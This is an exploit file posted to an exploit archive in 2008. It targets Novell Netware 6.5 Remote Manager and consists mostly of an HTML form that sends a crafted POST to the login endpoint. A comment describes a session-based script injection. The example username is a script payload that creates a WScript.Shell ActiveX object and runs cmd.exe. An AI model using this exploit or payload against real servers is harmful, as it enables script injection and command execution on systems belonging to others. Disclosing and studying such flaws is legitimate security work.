Home / exploitsPDF  

netbeware.txt

Posted on 22 August 2008

<!--- Jeremy Brown (0xjbrown41@gmail.com) Novell Netware 6.5's Remote Manager is vulnerable to script injection, session-wise, via the client browser. A specially crafted POST command to the server will inject data in the client's current session. Server will not resume normal operations via the client until session is cleared or another browser is used (IE vs. FF). ---> <html> <FORM method=POST action="https://192.168.1.201:8009/_LOGIN_SERVER2_" name="authenticator"> <center>Novell Netware 6.5 Remote Manager HTML Injection Exploit</center> <br><br> Username: <input type="text" name="usr"><br> Password: <input type="text" name="pwd"><br><br> <input type="submit" name="login" value="LOGIN"> <br><br><center>Example --> Username: "&gt;&lt;script&gt;var ex=new ActiveXObject("WScript.Shell");ex.run('cmd.exe /C ver');&lt;/script&gt;</center> </html>

 

TOP